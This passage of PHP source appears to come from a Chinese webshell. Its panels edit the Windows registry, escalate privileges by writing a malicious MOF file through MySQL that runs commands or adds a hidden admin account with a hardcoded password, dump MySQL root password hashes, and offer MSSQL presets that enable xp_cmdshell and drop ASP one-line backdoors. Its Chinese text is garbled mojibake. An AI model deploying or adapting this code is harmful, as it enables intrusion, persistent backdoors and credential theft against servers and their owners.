$_POST[\'dpath\'] : \'\';   \r\n$dpath = str_replace("\\\\\\\\", "\\\\", $dpath);      \r\nif   ($action=="del"){\r\n$out = $shell1->RegDelete($dpath);  \r\n} \r\n}else{\r\n$tip="�ݲ��Ա����ܿ��õĿ�����Ϊ���֮һ<br>Webshell��ڷ��������ΪWindowsϵͳ<br>PHP��Ȩ��������ڷdz����ε�ʱ����Գ��Ա�����<br></h5><br><br><br>";\r\nprint<<<END\r\n<div class="actall"><pre>\r\n<br><a href="?eanver=winapi&winshell=wscript"> [ WScript�� ] </a><br><br>\r\n<h5>������ʹ��PHP����Windows���е�Wscript����<br>\r\nWscriptΪ����cmd�����<br>{$tip}<a href="?eanver=winapi&winshell=shelluser"> [ Shell.User�� ] </a><br><br>\r\n<h5>������ʹ��PHP����Windows���е�Shell.user��<br>\r\nUSER��ΪWindowsϵͳ�û���������<br>{$tip}<a href="?eanver=winapi&winshell=regedit"> [ ע����� ] </a><br><br>\r\n<h5>������ʹ��PHP����Windows���е�Shell.Wscript��<br>\r\n<h5><font color=red>�����ܿɶ�ȡ��д�룬ɾ��ע�����</font>\r\nRegRead()�����ȡϵͳע�������<br>{$tip}</pre></div>\r\nEND;\r\n}\r\n//}\r\nbreak;\r\n \r\ncase "mofshell":\r\n session_start();\r\nif(!empty($_POST[\'submit\'])){\r\nsetcookie("connect");\r\nsetcookie("connect[host]",$_POST[\'host\']);\r\nsetcookie("connect[user]",$_POST[\'user\']);\r\nsetcookie("connect[pass]",$_POST[\'pass\']);\r\nsetcookie("connect[dbname]",$_POST[\'dbname\']);\r\nsetcookie("connect[path]",$_POST[\'path\']);\r\necho "<script>location.href=\'?eanver=mofshell&action=connect\'</script>";\r\n}\r\nif(empty($_GET["action"])){ \r\necho "<form action=\'?eanver=mofshell&action=connect\' method=\'post\'>";\r\necho "ip:";\r\necho "<div class=\'actall\'><input type=\'text\' name=\'host\' value=\'localhost:3306\'><br/></div>";\r\necho "�ʻ�:";\r\necho "<div class=\'actall\'><input type=\'text\' name=\'user\' value=\'root\'><br/></div>";\r\necho "����:";\r\necho "<div class=\'actall\'><input type=\'password\' name=\'pass\' value=\'123456\'><br/></div>";\r\necho "���:";\r\necho "<div class=\'actall\'><input type=\'text\' name=\'dbname\' value=\'mysql\'><br/></div>";\r\necho "��дĿ¼(\'\'savefile\'\'���ļ��):";\r\necho "<div class=\'actall\'><input type=\'text\' name=\'path\' value=\'c:/recycler/savefile\'><br/></div>";\r\necho "<div class=\'actall\'><input type=\'submit\' name=\'submit\' value=\'�ύ\'><br/></div>";\r\necho "</form>";\r\necho "<div class=\'actall\'>ps:mof��Ȩ������windows�����<br>1:mof��Ȩ���wscript.shell�齨ִ������shell.users���û�<br>2:���������ʱ�����ã�����Ӱ��ִ��Ч��<br>3:������֧��wscript.shell��shell.user˫����Ȩ<br>4:ִ����Ϻ���ȴ�Щʱ���ٲ鿴��<br>5:2�ַ�ʽ����ͬһʱ��ִ�У������ĵȴ�������ִ���������<br><br>��ͣ���ʻ����취:<br>";\r\necho "\r\n��һ net stop winmgmt ֹͣ����<br>\r\n�ڶ� ɾ���ļ��У�C:\\WINDOWS\\system32\\wbem\\Repository\\<br>\r\n��� net start winmgmt �����<br>\r\n���ģ���ϲ�����ִ��ˡ�<br>\r\nC:\\WINDOWS\\system32\\wbem\\Repository\\ �ŵ��Ǵ���⡡����ִ�е�.mof���ᱻ���뵽����ˡ�<br>\r\nȻ��һֱ���ű����õ�ʱ��ִ�С���<br>\r\nɾ��������������ؽ���Ĭ�ϴ���⡡���������ǰִ��mof��û�ˡ�</div>";\r\nexit;\r\n}\r\nif ($_GET[action]==\'connect\')\r\n{\r\n$conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die(\'<pre>\'.mysql_error().\'</pre>\');\r\necho "<form action=\'\' method=\'post\'>";\r\necho "<div class=\'actall\'>Cmd:";\r\necho "<input type=\'text\' style=\'width:400\' name=\'cmd\' value=\'$strCmd\'?></div>";\r\necho "<div class=\'actall\'><input type=\'submit\' value=\'  wscriptִ�����  \'>";\r\necho "</form><br><br>";\r\n\r\necho "<form action=\'\' method=\'post\'>";\r\necho "<input type=\'hidden\' name=\'flag\' value=\'flag\'>";\r\necho "<input type=\'submit\'value=\'��ȡwscriptִ�н�\'></div>";\r\necho "</form>";\r\n\r\necho "<hr>";\r\n \r\necho "<form action=\'\' method=\'post\'>";\r\necho "<input type=\'hidden\' name=\'shelluser\' value=\'shelluser\'>";\r\necho "<div class=\'actall\'><input type=\'submit\' value=\' shelluser����ʻ�  \'></div>";\r\necho "</form>"; \r\nif (isset($_POST[\'cmd\'])){\r\n$strCmd=$_POST[\'cmd\'];\r\n$cmdshell=\'cmd /c \'.$strCmd.\'>\'.$_COOKIE["connect"]["path"];\r\n$mofname="c:/windows/system32/wbem/mof/system.mof";\r\n$payload = "#pragma namespace(\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\")\r\n \r\ninstance of __EventFilter as \\$EventFilter\r\n{\r\n  EventNamespace = \\"Root\\\\\\\\\\\\\\\\Cimv2\\";\r\n  Name  = \\"filtP2\\";\r\n  Query = \\"Select * From __InstanceModificationEvent \\"\r\n      \\"Where TargetInstance Isa \\\\\\\\\\"Win32_LocalTime\\\\\\\\\\" \\"\r\n      \\"And TargetInstance.Second = 5\\";\r\n  QueryLanguage = \\"WQL\\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \\$Consumer\r\n{\r\n  Name = \\"consPCSV2\\";\r\n  ScriptingEngine = \\"JScript\\";\r\n  ScriptText =\r\n  \\"var WSH = new ActiveXObject(\\\\\\\\\\"WScript.Shell\\\\\\\\\\")\\\\\\\\nWSH.run(\\\\\\\\\\"$cmdshell\\\\\\\\\\")\\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n  Consumer = \\$Consumer;\r\n  Filter = \\$EventFilter;\r\n};";\r\nmysql_select_db($_COOKIE["connect"]["dbname"],$conn);\r\n$sql1="select \'$payload\' into dumpfile \'$mofname\';";\r\nif(mysql_query($sql1))\r\n  echo "<hr>ִ�����!<br> ���\\"��ȡwscriptִ�н�\\"�鿴��!!<br>���ɹ���ִ�м��Ρ�<br>ps:wscriptִ����Ҫwscript.shell�齨���ڡ�<hr>"; else die(mysql_error());\r\n mysql_close($conn);\r\n}\r\n \r\nif(isset($_POST[\'flag\']))\r\n{\r\n  $conn=mysql_connect($_COOKIE["connect"]["host"],$_COOKIE["connect"]["user"],$_COOKIE["connect"]["pass"])  or die(\'<pre>\'.mysql_error().\'</pre>\');\r\n   $sql2="select load_file(\\"".$_COOKIE["connect"]["path"]."\\");";\r\n  $result2=mysql_query($sql2);\r\n  $num=mysql_num_rows($result2);\r\n  while ($row = mysql_fetch_array($result2, MYSQL_NUM)) {\r\n    echo "<hr/>";\r\n    echo \'<pre>\'. $row[0].\'</pre>\';\r\n  }\r\n  mysql_close($conn);\r\n}\r\n\r\n\r\n\r\nif (isset($_POST[\'shelluser\'])){\r\n\r\n$mofname="c:/windows/system32/wbem/mof/system.mof";\r\n\r\n$payload = "#pragma namespace(\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\.\\\\\\\\\\\\\\\\root\\\\\\\\\\\\\\\\subscription\\")\r\n \r\ninstance of __EventFilter as \\$EventFilter\r\n{\r\n  EventNamespace = \\"Root\\\\\\\\\\\\\\\\Cimv2\\";\r\n  Name  = \\"filtP2\\";\r\n  Query = \\"Select * From __InstanceModificationEvent \\"\r\n      \\"Where TargetInstance Isa \\\\\\\\\\"Win32_LocalTime\\\\\\\\\\" \\"\r\n      \\"And TargetInstance.Second = 5\\";\r\n  QueryLanguage = \\"WQL\\";\r\n};\r\n \r\ninstance of ActiveScriptEventConsumer as \\$Consumer\r\n{\r\n  Name = \\"consPCSV2\\";\r\n  ScriptingEngine = \\"JScript\\";\r\n  ScriptText =  \r\n\\"var WSH = new ActiveXObject(\\\\\\\\\\"Shell.Users\\\\\\\\\\")\\\\\\\\nz=WSH.create(\\\\\\\\\\"MofNewUser\\\\\\\\\\")\\\\\\\\nz.changePassword(\\\\\\\\\\"ASDfg123!@#...\\\\\\\\\\", \\\\\\\\\\"\\\\\\\\\\")\\\\\\\\nz.setting(\\\\\\\\\\"AccountType\\\\\\\\\\")=3\\";\r\n };\r\n \r\ninstance of __FilterToConsumerBinding\r\n{\r\n  Consumer = \\$Consumer;\r\n  Filter = \\$EventFilter;\r\n};";\r\n\r\nmysql_select_db($_COOKIE["connect"]["dbname"],$conn);\r\n$sql1="select \'$payload\' into dumpfile \'$mofname\';";\r\nif(mysql_query($sql1))\r\n  echo "<hr>ִ��������,�ʻ���MofNewUser ���룺ASDfg123!@#...    <br>ps:ShellUser����޻��Թ���,��5���Ӻ����в鿴��<hr>"; else die(mysql_error());\r\n mysql_close($conn);\r\n\r\n}\r\n}\r\nbreak;\r\n\r\ncase "readpass":\r\nif(isset($_POST[\'sub\'])){\r\n$name=$_POST[\'name\'];\r\n$pass=$_POST[\'password\'];\r\n$host=$_POST[\'host\'];\r\n$db=$_POST[\'db\'];\r\n\r\n$link = mysql_connect($host,$name,$pass);\r\nif(!link){\r\ndie("could not connect".mysql_error());\r\n}\r\n\r\nif(!mysql_select_db($db,$link)){\r\n\tdie("db".mysql_error());\r\n}\r\n\r\n$db_path_sql="select @@basedir";\r\nif($n=mysql_query($db_path_sql)){\r\n\t$db_path_rs=mysql_fetch_array($n);\r\n\t $db_path=str_replace("\\\\","/",$db_path_rs[0]);\r\n}\r\n$dropmoon=\'DROP table moon\';\r\n$sql="CREATE TABLE moon (`code` TEXT NOT NULL ) ENGINE = MYISAM CHARACTER SET utf8 COLLATE utf8_general_ci;";\r\n$exp="LOAD DATA LOCAL INFILE \'".$db_path."data/mysql/user.MYD\' INTO TABLE moon fields terminated by \'\' LINES TERMINATED BY \'\\0\';";\r\n$select="SELECT code FROM moon";\r\n$pass="";\r\nmysql_query($dropmoon);\r\nif(mysql_query($sql)){\r\n\tif($row=mysql_query($exp)){\r\n\t\tif($row=mysql_query($select)){\r\n\t\t\twhile($rows=mysql_fetch_array($row))\r\n\t\t\t\t{\r\n\t\t\t\techo $pass.=$rows[\'code\'];\r\n\t\t\t\t}\r\n\t}\r\n\t}\r\n}\r\n}\r\nelse{\r\n\r\n\techo \'<form action="" method="post">\';\r\n\techo "<h3>MYSQL��Ȩ�޶�ȡROOT���빤��</h3>";\r\n\techo \'<div class="actall">ip��&nbsp;&nbsp;&nbsp;<input type="text" name="host" value="localhost"><br></div>\';\r\n\techo \'<div class="actall">�ʻ���<input type="text" name="name" value="root"><br></div>\';\r\n\techo \'<div class="actall">���룺<input type="text" name="password"><br></div>\';\r\n\techo \'<div class="actall">�����<input type="text" name="db" value="mysql"></div>\';\r\n\techo \'<div class="actall">&nbsp&nbsp<input type="submit" value="    ��ȡ    " name="sub"></div>\';\r\n}\r\nbreak;\r\ncase "othersql":\r\n //�����ݿ���\r\n//function otherdb(){\r\n$db = isset($_GET[\'db\']) ? $_GET[\'db\'] : \'ms\';\r\nprint<<<END\r\n<form method="POST" name="dbform" id="dbform" action="?eanver=othersql&db={$db}" enctype="multipart/form-data">\r\n<div class="actall">\r\n<a href="?eanver=othersql&db=ms"> &nbsp; MSSQL &nbsp;</a>\r\n<a href="?eanver=othersql&db=ora"> &nbsp; Oracle &nbsp;</a>\r\n<a href="?eanver=othersql&db=ifx"> &nbsp; InforMix &nbsp;</a>\r\n<a href="?eanver=othersql&db=fb"> &nbsp; FireBird &nbsp;</a>\r\n<a href="?eanver=othersql&db=db2">&nbsp; DB2 &nbsp;</a></div></form>\r\nEND;\r\nif ($db=="ms"){\r\n$mshost = isset($_POST[\'mshost\']) ? $_POST[\'mshost\']:\'localhost\';\r\n$msuser = isset($_POST[\'msuser\']) ? $_POST[\'msuser\'] : \'sa\';\r\n$mspass = isset($_POST[\'mspass\']) ? $_POST[\'mspass\'] : \'\';\r\n$msdbname = isset($_POST[\'msdbname\']) ? $_POST[\'msdbname\'] : \'master\';\r\n$msaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$msquery = isset($_POST[\'mssql\']) ? $_POST[\'mssql\'] : \'\';\r\n$msquery = stripslashes($msquery);\r\nprint<<<END\r\n<div class="actall">\r\n<form method="POST" name="msform" action="?eanver=othersql&db=ms">\r\n�����<input type="text" name="mshost" value="{$mshost}" style="width:100px">\r\n�ʻ�:<input type="text" name="msuser" value="{$msuser}" style="width:100px">\r\n����:<input type="text" name="mspass" value="{$mspass}" style="width:100px">\r\n���:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>\r\n<script language="javascript">\r\nfunction msFull(i){\r\nStr = new Array(11);\r\nStr[0] = "";\r\nStr[1] = "select @@version;";\r\nStr[2] = "select name from sysdatabases;";\r\nStr[3] = "select name from sysobject where type=\'U\';";\r\nStr[4] = "select name from syscolumns where id=Object_Id(\'table_name\');";\r\nStr[5] = "Use master dbcc addextendedproc (\'sp_OACreate\',\'odsole70.dll\');";\r\nStr[6] = "Use master dbcc addextendedproc (\'xp_cmdshell\',\'xplog70.dll\');";\r\nStr[7] = "EXEC sp_configure \'show advanced options\', 1;RECONFIGURE;EXEC sp_configure \'xp_cmdshell\', 1;RECONFIGURE;";\r\nStr[8] = "exec sp_configure \'show advanced options\', 1;RECONFIGURE;exec sp_configure \'Ole Automation Procedures\',1;RECONFIGURE;";\r\nStr[9] = "exec sp_configure \'show advanced options\', 1;RECONFIGURE;exec sp_configure \'Ad Hoc Distributed Queries\',1;RECONFIGURE;";\r\nStr[10] = "Exec master.dbo.xp_cmdshell \'net user\';";\r\nStr[11] = "Declare @s int;exec sp_oacreate \'wscript.shell\',@s out;Exec SP_OAMethod @s,\'run\',NULL,\'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\\\\\1.asp\';";\r\nStr[12] = "sp_makewebtask @outputfile=\'d:\\\\\\\\web\\\\\\\\bin.asp\',@charset=gb2312,@query=\'select \'\'<%execute(request(chr(35)))%>\'\'\' ";\r\nmsform.mssql.value = Str[i];\r\nreturn true;\r\n}\r\n</script>\r\n<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>\r\n<select onchange="return msFull(options[selectedIndex].value)">\r\n<option value="0" selected>ִ�����</option>\r\n<option value="1">��ʾ�汾</option>\r\n<option value="2">��ݿ�</option>\r\n<option value="3">���</option>\r\n<option value="4">�ֶ�</option>\r\n<option value="5">sp_oacreate</option>\r\n<option value="6">xp_cmdshell</option>\r\n<option value="7">xp_cmdshell(2005)</option>\r\n<option value="8">sp_oacreate(2005)</option>\r\n<option value="9">��openrowset(2005)</option>\r\n<option value="10">xp_cmdshell exec</option>\r\n<option value="10">sp_oamethod exec</option>\r\n<option value="11">sp_makewebtask</option>\r\n</select>\r\n<input type="hidden" name="action" value="msquery">\r\n<input class="bt" type="submit" value="ִ��"></form></div>\r\nEND;\r\nif ($msaction == \'msquery\'){\r\n$msconn= mssql_connect ($mshost , $msuser, $mspass);\r\nmssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message());\r\n$msresult = mssql_query($msquery) or die(mssql_get_last_message());\r\necho \'<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">\'."\\n<tr>\\n";\r\nfor ($i=0; $i<mssql_num_fields($msresult); $i++)\r\n{echo \'<td><b>\'.mssql_field_name($msresult, $i)."</b></td>\\n";}\r\necho "</tr>\\n";\r\nmssql_data_seek($result, 0);\r\nwhile ($msrow=mssql_fetch_row($msresult))\r\n{\r\necho "<tr>\\n";\r\nfor ($i=0; $i<mssql_num_fields($msresult); $i++ )\r\n{echo \'<td>\'."$msrow[$i]".\'</td>\';}\r\necho "</tr>\\n";\r\n}\r\necho "</table></font>";\r\nmssql_free_result($msresult);\r\nmssql_close();\r\n}\r\n}\r\nelseif ($db=="ora"){\r\n$orahost = isset($_POST[\'orahost\']) ? $_POST[\'orahost\'] : \'localhost\';\r\n$oraport = isset($_POST[\'oraport\']) ? $_POST[\'oraport\'] : \'1521\';\r\n$orauser = isset($_POST[\'orauser\']) ? $_POST[\'orauser\'] : \'root\';\r\n$orapass = isset($_POST[\'orapass\']) ? $_POST[\'orapass\'] : \'123456\';\r\n$orasid = isset($_POST[\'orasid\']) ? $_POST[\'orasid\'] : \'ORCL\';\r\n$oraaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$oraquery = isset($_POST[\'orasql\']) ? $_POST[\'orasql\'] : \'\';\r\n$oraquery = stripslashes($oraquery);\r\nprint<<<END\r\n<form method="POST" name="oraform" action="?eanver=othersql&db=ora">\r\n<div class="actall">\r\n���:<input type="text" name="orahost" value="{$orahost}" style="width:100px">\r\n�˿�:<input type="text" name="oraport" value="{$oraport}" style="width:50px">\r\n�ʻ�:<input type="text" name="orauser" value="{$orauser}" style="width:80px">\r\n����:<input type="text" name="orapass" value="{$orapass}" style="width:100px">\r\nSID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>\r\n<script language="javascript">\r\nfunction oraFull(i){\r\nStr = new Array(5);\r\nStr[0] = "";\r\nStr[1] = "select version();";\r\nStr[2] = "SELECT NAME FROM V$DATABASE";\r\nStr[3] = "select * From all_objects where object_type=\'TABLE\'";\r\nStr[4] = "select column_name from user_tab_columns where table_name=\'table1\'";\r\noraform.orasql.value = Str[i];\r\nreturn true;\r\n}\r\n</script>\r\n<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>\r\n<select onchange="return oraFull(options[selectedIndex].value)">\r\n<option value="0" selected>ִ�����</option>\r\n<option value="1">��ʾ�汾</option>\r\n<option value="2">��ݿ�</option>\r\n<option value="3">���</option>\r\n<option value="4">�ֶ�</option>\r\n</select>\r\n<input type="hidden" name="action" value="myquery">\r\n<input class="bt" type="submit" value="Query"></div></form>\r\nEND;\r\nif($oraaction == \'oraquery\'){\r\n$oralink=OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror());\r\n$oraresult=ociparse($oralink,$oraquery) or die(ocierror());\r\n$orarow=oci_fetch_row($oraresult);\r\necho \'<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">\'."\\n<tr>\\n";\r\nfor ($i=0; $i<oci_num_fields($oraresult); $i++)\r\n{echo \'<td><b>\'.oci_field_name($oraresult, $i)."</b></td>\\n";}\r\necho "</tr>\\n";\r\nociresult($oraresult, 0);\r\nwhile ($orarow=ora_fetch_row($oraresult))\r\n{\r\necho "<tr>\\n";\r\nfor ($i=0; $i<ora_num_fields($result); $i++ )\r\n{echo \'<td>\'."$orarow[$i]".\'</td>\';}\r\necho "</tr>\\n";\r\n}\r\necho "</table></font>";\r\noci_free_statement($oraresult);\r\nocilogoff();\r\n}\r\n}\r\nelseif ($db == "ifx"){\r\n$ifxuser = isset($_POST[\'ifxuser\']) ? $_POST[\'ifxuser\'] : \'root\';\r\n$ifxpass = isset($_POST[\'ifxpass\']) ? $_POST[\'ifxpass\'] : \'123456\';\r\n$ifxdbname = isset($_POST[\'ifxdbname\']) ? $_POST[\'ifxdbname\'] : \'ifxdb\';\r\n$ifxaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$ifxquery = isset($_POST[\'ifxsql\']) ? $_POST[\'ifxsql\'] : \'\';\r\n$ifxquery = stripslashes($ifxquery);\r\nprint<<<END\r\n<form method="POST" name="ifxform" action="?eanver=othersql&db=ifx">\r\n<div class="actall">���:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">\r\n�ʻ�:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">\r\n����:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>\r\n<script language="javascript">\r\nfunction ifxFull(i){\r\nStr = new Array(11);\r\nStr[0] = "";\r\nStr[1] = "select dbservername from sysobjects;";\r\nStr[2] = "select name from sysdatabases;";\r\nStr[3] = "select tabname from systables;";\r\nStr[4] = "select colname from syscolumns where tabid=n;";\r\nStr[5] = "select username,usertype,password from sysusers;";\r\nifxform.ifxsql.value = Str[i];\r\nreturn true;\r\n}\r\n</script>\r\n<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>\r\n<select onchange="return ifxFull(options[selectedIndex].value)">\r\n<option value="0" selected>ִ�����</option>\r\n<option value="1">��ݿ�������</option>\r\n<option value="1">��ݿ�</option>\r\n<option value="2">���</option>\r\n<option value="3">�ֶ�</option>\r\n<option value="4">hashes</option>\r\n</select>\r\n<input type="hidden" name="action" value="ifxquery">\r\n<input class="bt" type="submit" value="Query"></div></form>\r\nEND;\r\nif($ifxaction == \'ifxquery\'){\r\n$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());\r\n$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg());\r\n$ifxrow=ifx_fetch_row($ifxresult);\r\necho \'<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">\'."\\n<tr>\\n";\r\nfor($i=0; $i<ifx_num_fields($ifxresult); $i++)\r\n{echo \'<td><b>\'.ifx_fieldproperties($ifxresult)."</b></td>\\n";}\r\necho "</tr>\\n";\r\nmysql_data_seek($ifxresult, 0);\r\nwhile ($ifxrow=ifx_fetch_row($ifxresult))\r\n{\r\necho "<tr>\\n";\r\nfor ($i=0; $i<ifx_num_fields($ifxresult); $i++ )\r\n{echo \'<td>\'."$ifxrow[$i]".\'</td>\';}\r\necho "</tr>\\n";\r\n}\r\necho "</table></font>";\r\nifx_free_result($ifxresult);\r\nifx_close();\r\n}\r\n}\r\nelseif ($db=="db2"){\r\n$db2host = isset($_POST[\'db2host\']) ? $_POST[\'db2host\'] : \'localhost\';\r\n$db2port = isset($_POST[\'db2port\']) ? $_POST[\'db2port\'] : \'50000\';\r\n$db2user = isset($_POST[\'db2user\']) ? $_POST[\'db2user\'] : \'root\';\r\n$db2pass = isset($_POST[\'db2pass\']) ? $_POST[\'db2pass\'] : \'123456\';\r\n$db2dbname = isset($_POST[\'db2dbname\']) ? $_POST[\'db2dbname\'] : \'mysql\';\r\n$db2action = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$db2query = isset($_POST[\'db2sql\']) ? $_POST[\'db2sql\'] : \'\';\r\n$db2query = stripslashes($db2query);\r\nprint<<<END\r\n<form method="POST" name="db2form" action="?eanver=othersql&db=db2">\r\n<div class="actall">���:<input type="text" name="db2host" value="{$db2host}" style="width:100px">\r\n�˿�:<input type="text" name="db2port" value="{$db2port}" style="width:60px">\r\n�ʻ�:<input type="text" name="db2user" value="{$db2user}" style="width:100px">\r\n����:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">\r\n���:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>\r\n<script language="javascript">\r\nfunction db2Full(i){\r\nStr = new Array(4);\r\nStr[0] = "";\r\nStr[1] = "select schemaname from syscat.schemata;";\r\nStr[2] = "select name from sysibm.systables;";\r\nStr[3] = "select colname from syscat.columns where tabname=\'table_name\';";\r\nStr[4] = "db2 get db cfg for db_name;";\r\ndb2form.db2sql.value = Str[i];\r\nreturn true;\r\n}\r\n</script>\r\n\r\n<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>\r\n<select onchange="return db2Full(options[selectedIndex].value)">\r\n<option value="0" selected>ִ�����</option>\r\n<option value="1">��ݿ�</option>\r\n<option value="1">���</option>\r\n<option value="2">�ֶ�</option>\r\n<option value="3">��ݿ�����</option>\r\n</select>\r\n<input type="hidden" name="action" value="db2query">\r\n<input class="bt" type="submit" value="Query"></div></form>\r\nEND;\r\nif ($myaction == \'db2query\'){\r\n$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());\r\n$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg());\r\n$db2row=db2_fetch_row($db2result);\r\necho \'<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">\'."\\n<tr>\\n";\r\nfor ($i=0; $i<db2_num_fields($db2result); $i++)\r\n{echo \'<td><b>\'.db2_field_name($db2result)."</b></td>\\n";}\r\necho "</tr>\\n";\r\nwhile ($db2row=db2_fetch_row($db2result))\r\n{\r\necho "<tr>\\n";\r\nfor ($i=0; $i<db2_num_fields($db2result); $i++ )\r\n{echo \'<td>\'."$db2row[$i]".\'</td>\';}\r\necho "</tr>\\n";\r\n}\r\necho "</table></font>";\r\ndb2_free_result($db2result);\r\ndb2_close();\r\n}\r\n}\r\nelseif($db == "fb") {\r\n$fbhost = isset($_POST[\'fbhost\']) ? $_POST[\'fbhost\'] : \'localhost\';\r\n$fbpath = isset($_POST[\'fbpath\']) ? $_POST[\'fbpath\'] : \'\';\r\n$fbpath = str_replace("\\\\\\\\", "\\\\", $fbpath);\r\n$fbuser = isset($_POST[\'fbuser\']) ? $_POST[\'fbuser\'] : \'sysdba\';\r\n$fbpass = isset($_POST[\'fbpass\']) ? $_POST[\'fbpass\'] : \'masterkey\';\r\n$fbaction = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';\r\n$fbquery = isset($_POST[\'fbsql\']) ? $_POST[\'fbsql\'] : \'\';\r\n$fbquery = stripslashes($fbquery);\r\nprint<<<END\r\n<form method="POST" name="fbform" action="?eanver=othersql&db=fb">\r\n<div class="actall">���:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">\r\n��ַ:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">\r\n�ʻ�:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">\r\n����:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>\r\n<script language="javascript">\r\nfunction fbFull(i){\r\nStr = new Array(5);\r\nStr[0] = "";\r\nStr[1] = "select RDB\\$RELATION_NAME from RDB\\$RELATIONS;";\r\nStr[2] = "select RDB\\$FIELD_NAME from RDB\\$RELATION_FIELDS where RDB\\$RELATION_NAME=\'table_name\';";\r\nStr[3] = "input \'D:\\\\createtable.sql\';";\r\nStr[4] = "shell netstat -an;";\r\nfbform.fbsql.value = Str[i];\r\nreturn true;\r\n}\r\n</script>\r\n<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>\r\n<select onchange="return fbFull(options[selectedIndex].value)">\r\n<option value="0" selected>ִ�����</option>\r\n<option value="1">���</option>\r\n<option value="2">�ֶ�</option>\r\n<option value="3">���sql</option>\r\n<option value="4">shell</option>\r\n</select>\r\n<input type="hidden" name="action" value="fbquery">\r\n<input class="bt" type="submit" value="Query"></div></form>\r\nEND;\r\nif($fbaction == \'fbquery\'){\r\n$fblink = ibase_connect($fbhost.\':\'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg());\r\n$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg());\r\necho \'<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">\'."\\n<tr>\\n";\r\nfor ($i=0; $i<ibase_num_fields($fbresult); $i++)\r\n{echo \'<td><b>\'.ibase_field_info($fbresult, $i)."</b></td>\\n";}\r\necho "</tr>\\n";\r\nibase_field_info($fbresult, 0);\r\nwhile ($fbrow=ibase_fetch_row($fbresult))\r\n{\r\necho "<tr>\\n";\r\nfor ($i=0; $i<ibase_num_fields($fbresult); $i++ )\r\n{echo \'<td>\'."$fbrow[$i]".\'</td>\';}\r\necho "</tr>\\n";\r\n}\r\necho "</table></font>";\r\nibase_free_result($fbresult);\r\nibase_close();\r\n}\r\n}\r\n//}\r\nbreak;\r\n\r\n\r\ncase "zippak":\r\n//function zipact()\r\n//{\r\n$zfile=$_POST[\'zfile\'] ? $_POST[\'zfile\']:\'php.zip\';\r\n$jypt=$_POST[\'jypt\'] ? $_POST[\'jypt\']:\'./\';\r\n$tip="δ��ʼ��ѹ";\r\nif($_POST[\'zip\']==\'zip\'){\r\nif(function_exists(zip_open)){\r\n$zfile=key_exists(\'zip\', $_GET) && $_GET[\'zip\']?$_GET[\'zip\']:$zfile;\r\n$zfile= str_replace(array(dirname(__FILE__)."/",dirname(__FILE__)."\\\\"),array("",""),$zfile);\r\n$zpath=str_replace(\'\\\\\',\'/\',dirname(__FILE__)).\'/\'.$zfile;\r\nif(!is_file($zpath)){$tip=\'�ļ�"\'.$zpath.\'"������!\';}else{\r\n$zip= new ZipArchive();\r\n$rs=$zip->open($zpath);\r\nif($rs !== TRUE){$tip=\'��ѹʧ��:\'.$rs;}\r\n$zip->extractTo($jypt);\r\n$zip->close();\r\n$tip=$zfile.\'��ѹ�ɹ�!\';}\r\n}else{$tip="�������֧��PHP_ZIP��,��ȷ��";}\r\n}\r\nprint<<<END\r\n<div class="actall">\r\n<form action="?eanver=info_f" method="POST">\r\n<input type="hidden" name="zip" id="zip" value="zip">\r\n��ģ��ʹ��PHP��zip_open��չ�����ZIPѹ��ļ�<br>\r\nʹ��ǰ���ڡ�<b><a href="??eanver=info_f">ϵͳ��Ϣ</a></b>����ȷ��ϵͳ֧��php_zip<br>\r\nѹ��ļ�·����д�¼�Ŀ¼�����·�������Ŀ¼�Ƿ�ɲ��δ���� :-(<br>\r\nȷ��Ŀ��·����д<br><br>\r\nѹ��ļ�·����<br>\r\n<input type="text" name="zfile" id="zfile" value="{$zfile}" style="width:720px;"><br><br>\r\nĿ��·����\r\n<input type="text" name="jypt" id="jypt" value="{$jypt}" style="width:720px;"><br><br>\r\n<input type="submit" value="��ʼ��ѹ" 